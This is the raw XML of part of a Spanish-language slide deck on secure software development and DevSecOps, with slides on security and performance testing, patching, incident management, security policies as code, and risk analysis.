              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3826691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7DADC-72E2-057E-9F6E-E069CB02766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27D1BC4-271C-F3AB-FAF4-C41526FB1E9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297ECF2-9846-729F-C9E8-FD8834E6A498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Pruebas dinámicas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Revisión de la superficie de ataque.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Pruebas de Seguridad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Realiza pruebas de seguridad, como pruebas de penetración y escaneos de vulnerabilidades, para identificar problemas de seguridad en el código.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Pruebas de Rendimiento y Estrés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Asegúrate de que la aplicación sea resistente a ataques de denegación de servicio y pueda manejar cargas inusuales.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Marcador de número de diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5F3E48-2A1B-B6B4-9A6C-529ABA492783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="280958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EFF90-A1EA-909E-522C-8D7AE52B545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7FCC2F-A317-D126-B0A8-826D041B5CA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D83098A-2172-6525-C6CD-0BE457925D1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9A6F127-B80E-19B0-7753-A69B173CCED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3015454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F1A14-F249-DFA7-3EF7-29BCCFB76A3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5492C7-22C0-E030-D085-BB1E433B35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AFCE10-0594-6BEE-C52A-F98AF9E15DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Actualizaciones y Parches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Mantén el software actualizado con los últimos parches de seguridad y actualizaciones.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gestión de Incidentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Establece procedimientos para responder a incidentes de seguridad y para aplicar correcciones de manera eficiente.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRP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F1C3289-7D12-75E8-7611-4DF366D3FCE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423804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5E01C-7814-F673-D537-99500992F02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1F04C82-998E-093A-CEA9-69547B3E06E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1014A24-A197-4B27-5C52-9B95214FF6F2}"/>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BDE9DB0-5D6C-E945-CAEA-8616F930C225}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1630373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03E82-1417-2BCA-85E5-D34BB94753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98302C-8DFD-1A66-EECF-AD30C0CAA37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8832B7-1D10-14CB-EDC2-10A9532E5168}"/>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8733117-DF0F-A12D-76AD-56CB90B953AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3254885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8CF5-BD06-1748-0505-5FF263273B1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C467F19-5B5C-C372-871E-BAFD5972C56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F44F3BA-C841-135F-5D52-BA35D38197F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7E10BBD-57DE-51F6-D183-8DED4E52F0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883832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33D67-6148-B276-D5AF-F3A40FF482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87B2463-246E-9662-2B45-AD8885B8B06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66991E-DA08-CC61-868C-DFB1CB26761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002E9DED-D7EC-E2A2-4E40-69EA8D8ED757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3044416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A6F21-A963-F517-5933-2E1CBBC4842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DC0A8D-5D8D-58B8-1079-2E0DFFCA021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B102DE2-B191-E3A7-8094-E87B1EA98B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s-ES" sz="1200" dirty="0"/>
              <a:t>La incorporación de medidas de seguridad en el ciclo de vida de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" dirty="0"/>
              <a:t> es un enfoque que pone énfasis especial en garantizar que las prácticas de seguridad estén presenten desde la fase inicial hasta la última etapa del proceso de desarrollo de software. En lugar de tratar la seguridad como un elemento aparte al proceso de desarrollo, se busca desde el principio. Este enfoque resulta crucial para asegurar que las aplicaciones y sistemas sean desde el inicio resistentes y seguros frente a cualquier amenaza</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B329C15-E78D-EFEC-8B45-0576D501645D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424400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75FA-8ED1-D12C-C81B-4E2ACD201F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A6052A-0E24-7E49-AA56-9CDBFB8F9AE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A49EE8-16A2-016B-3E68-8BD82873295C}"/>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41C15B9D-A603-B598-8145-7A09F4F1789B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2256266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1DF60-56A5-4F52-3405-800C409B90D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DA6305-3F2A-9859-6990-A94C29DBC28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D88EC9A-9AFC-004F-7928-6CF581E85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s-ES" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>Varios de nuestros equipos han tenido buenos resultados al tratar a las </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>políticas de seguridad como código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>. Cuando decimos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>como código</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>, no nos limitamos a escribir estas políticas en un archivo, sino que también aplicamos técnicas como mantener ese código versionado, introducir validaciones automatizadas en el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>pipeline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Inter"/>
              </a:rPr>
              <a:t>, despliegues automatizados a ambientes así como observar y monitorear su funcionamiento.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="es-ES" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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6F1043DA-9F06-E834-A86F-29C050A086C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2466418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ED223-D1D5-7B43-202D-487CDF68D6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DEC51D-35D0-CB77-7E60-5C4F8801FDA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7D04E44-0ECD-64A5-10F3-7E34274D2A03}"/>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A173585E-92E2-A5A3-372D-A411E711960E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813518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B250C-805C-5F64-96F4-E1ED28DCF78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AA2A1B7-91E9-916B-CB16-C90AE5A073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11C120-E56D-1C6A-2E5D-8F7A085C3920}"/>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46267D93-5C9A-F041-F004-E50F162C3DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C9993EAA-8FF6-4FA7-AB56-9BA614B179BC}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217093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AF1A6-FD1D-2921-2682-EED1190EFA1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F7F351-35C4-D78E-736D-588D1E3CFA4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15EC32-7A61-F335-2FF5-9B7A4FDAA6F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>En el desarrollo de software, es crucial cumplir con requisitos mínimos de seguridad. Sin embargo, estos requisitos pueden variar significativamente de un proyecto a otro. La clave está en analizar los riesgos y el contexto particular del software que estamos desarrollando para determinar los requisitos de seguridad necesarios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Análisis de riesgo</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Identificar y priorizar los riesgos en el proyecto es esencial.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Debes tomar decisiones sobre cómo responder a estos riesgos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Visión incompleta es mejor que ninguna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Es importante recordar que es preferible tener una visión incompleta de la seguridad de tu software que no tener ninguna.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Visibilidad y certeza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El análisis de riesgo proporciona visibilidad y certeza sobre la situación de seguridad del proyecto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="es-ES" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>El equilibrio entre costes y la calidad y seguridad del software es un desafío constante en el desarrollo de software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Insuficiencia de recursos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 menudo, los recursos disponibles, como tiempo y presupuesto, son limitados.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Esto puede influir en la calidad y seguridad del software si no se gestionan adecuadamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Toma de decisiones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En el desarrollo de software, debemos tomar decisiones sobre cómo asignar los recursos disponibles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Equilibrar costes, calidad y seguridad es una consideración crítica.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="es-ES" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
